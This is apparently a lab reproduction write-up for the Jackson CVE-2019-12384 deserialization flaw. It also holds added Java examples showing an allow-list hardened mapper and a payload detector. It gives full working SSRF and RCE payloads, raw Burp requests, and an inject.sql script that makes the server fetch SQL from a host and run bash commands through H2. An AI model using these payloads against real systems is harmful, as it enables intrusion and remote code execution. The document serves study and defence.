Jackson CVE-2019-12384 RCE Reproduction Notes

Vulnerability Overview

The Jackson library has a deserialization vulnerability when it deserializes JSON: if the class that gets deserialized can be controlled, it can be used to trigger server-side request forgery (SSRF) and remote code execution (RCE).
For the vulnerability principle and analysis, see:
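The root of the bug described above is polymorphic type handling: with default typing enabled, the first element of a `["class.Name", {...}]` array picks the class Jackson instantiates. The following is an added example (not code from the original post or from the vulhub environment) that puts the vulnerable ObjectMapper configuration next to a hardened one that only allows an explicit package prefix. It assumes jackson-databind 2.10 or later on the classpath for the `BasicPolymorphicTypeValidator` API; the class name `JacksonTypingDemo`, the allow-listed package `com.example.model.` and the host placeholder `ATTACKER_HOST` are hypothetical.

```java
// Added example: vulnerable vs. hardened Jackson default-typing configuration.
// Assumes jackson-databind >= 2.10 (PolymorphicTypeValidator API).
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingDemo {

    // The pattern behind the vulnerable test page: default typing switched on with no
    // validator, so a ["class.Name", {...}] array may name any class on the classpath,
    // e.g. ch.qos.logback.core.db.DriverManagerConnectionSource from this write-up.
    static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10, still common in old code
        return mapper;
    }

    // Hardened form: polymorphic typing stays available, but only subtypes under an
    // explicit allow-listed prefix (hypothetical com.example.model.) may be resolved.
    // Any other type id is rejected before an instance is created.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    public static void main(String[] args) throws Exception {
        // The SSRF payload from the write-up, lab IP replaced by a placeholder host.
        String poc = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
                + " {\"url\":\"jdbc:h2:tcp://ATTACKER_HOST:4444/~/test\"}]";

        try {
            hardenedMapper().readValue(poc, Object.class);
            System.out.println("unexpected: payload accepted");
        } catch (InvalidTypeIdException e) {
            // Expected: the validator denies the type id, nothing is instantiated,
            // so no JDBC connection is ever attempted.
            System.out.println("rejected type id: " + e.getTypeId());
        }
        // vulnerableMapper().readValue(poc, Object.class) is deliberately not called here:
        // with the H2 driver present it would instantiate the connection source and
        // open the outbound connection, which is exactly the SSRF shown below.
    }
}
```

The allow-list, not a denylist of known gadget classes, is the durable fix: Jackson's own blocklist only grows one gadget at a time, while an allow-listed prefix rejects every class outside it, including ones nobody has published yet.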

Vulnerability Environment

Start the vulnerable environment:

git clone https://github.com/cnsimo/vu1hub.git
cd vu1hub/jackson/CVE-2019-12384-RCE/
docker-compose up -d

Once the command completes, wait a moment for the service to start, then visit http://your-ip:8080 to reach the Jackson test page. The POC can be submitted via either GET or POST.

Vulnerability Reproduction

SSRF

Submit the POC via Burp (bp):
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.80.133:4444/~/test"}]

The POC request constructed in Burp is as follows:

POST /fuckme HTTP/1.1
Host: fuck.me:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.80.133:4444/~/test"}]

The callback request from the vulnerable server is received successfully:

RCE

Submit the POC via Burp (bp):
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.80.133:8080/inject.sql'"}]

This POC uses the same SSRF primitive to make the server fetch a malicious file, which H2 then executes through the INIT=RUNSCRIPT option in the JDBC URL.

The content of the malicious file inject.sql is as follows:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('ping 1.1.1.1')

The POC request constructed in Burp is as follows:

POST /fuckme HTTP/1.1
Host: fuck.me:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM'http://192.168.80.133:8080/inject.sql'"}]

Enter the Docker container and check whether a `ping 1.1.1.1` process exists:

# enter the container
docker exec -it jackson-fuckme bash
# list processes
ps -ef | grep ping
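Both POCs share one shape on the wire: a two-element JSON array whose first element is a fully qualified class name, and in the RCE case a JDBC URL carrying INIT= / RUNSCRIPT. The following is an added example (not code from the original post or the vulhub project) of a pre-deserialization check a service or WAF layer could run over request bodies to flag that shape before the payload ever reaches a type-enabled mapper. It inspects the JSON with a plain ObjectMapper whose default typing is off, so `readTree()` only builds a tree and never instantiates the named class. Assumes jackson-databind on the classpath; the class name `PolymorphicPayloadCheck`, the method `inspect`, the host placeholder `ATTACKER_HOST` and the sample bodies are constructed for this example.

```java
// Added example: flag polymorphic-typing payloads in untrusted JSON before deserialization.
// Assumes jackson-databind on the classpath. Default typing is OFF on this mapper on purpose.
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.Optional;

public class PolymorphicPayloadCheck {

    // Tree-only mapper: readTree() never resolves or instantiates a type id.
    private static final ObjectMapper TREE_ONLY = new ObjectMapper();

    // Gadget class used in this write-up. A denylist is a detection signal, not the fix;
    // the fix is an allow-list PolymorphicTypeValidator on the application's own mapper.
    private static final List<String> KNOWN_GADGETS = Arrays.asList(
            "ch.qos.logback.core.db.DriverManagerConnectionSource");

    /** Returns a reason if the body looks like a polymorphic-typing attack, else empty. */
    static Optional<String> inspect(String body) {
        JsonNode root;
        try {
            root = TREE_ONLY.readTree(body);
        } catch (Exception e) {
            return Optional.empty(); // not JSON: nothing for this check to decide
        }
        // Shape 1: ["fully.qualified.Class", {...}]  (array form used by both POCs)
        if (root.isArray() && root.size() == 2
                && root.get(0).isTextual() && root.get(1).isObject()) {
            String typeId = root.get(0).asText();
            if (KNOWN_GADGETS.contains(typeId)) {
                return Optional.of("known gadget type id: " + typeId);
            }
            Optional<String> jdbc = suspiciousJdbcUrl(root.get(1));
            if (jdbc.isPresent()) {
                return jdbc;
            }
            if (typeId.indexOf('.') > 0) {
                // Lower confidence: any dotted name in type-id position is unusual for
                // legitimate clients of an endpoint that should not accept type ids.
                return Optional.of("unexpected type id in input: " + typeId);
            }
        }
        // Shape 2: {"@class": "...", ...}  (Jackson's property-based default typing)
        if (root.isObject() && root.has("@class")) {
            return Optional.of("unexpected @class in input: " + root.get("@class").asText());
        }
        return Optional.empty();
    }

    // Flags the H2 features the RCE POC relies on: INIT= runs SQL on connect and
    // RUNSCRIPT FROM pulls that SQL from a URL.
    private static Optional<String> suspiciousJdbcUrl(JsonNode obj) {
        JsonNode url = obj.get("url");
        if (url == null || !url.isTextual()) {
            return Optional.empty();
        }
        String u = url.asText().toLowerCase(Locale.ROOT);
        if (u.startsWith("jdbc:") && (u.contains("init=") || u.contains("runscript"))) {
            return Optional.of("jdbc url with INIT/RUNSCRIPT: " + url.asText());
        }
        return Optional.empty();
    }

    public static void main(String[] args) {
        // Constructed samples: the two POC bodies (lab IP replaced by ATTACKER_HOST)
        // and one benign body that must pass.
        String[] samples = {
            "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", "
                + "{\"url\":\"jdbc:h2:tcp://ATTACKER_HOST:4444/~/test\"}]",
            "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", "
                + "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;"
                + "INIT=RUNSCRIPT FROM 'http://ATTACKER_HOST:8080/inject.sql'\"}]",
            "{\"name\":\"alice\",\"age\":30}"
        };
        for (String s : samples) {
            System.out.println(inspect(s).orElse("ok") + "  <- " + s);
        }
    }
}
```

Run as a gate in front of the real deserialization: the first two samples are flagged (gadget type id; the JDBC check fires only when the type id is unknown), the benign object passes. Because the check is a name match on untrusted text it complements, rather than replaces, the allow-list validator on the mapper that actually performs the deserialization.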

References




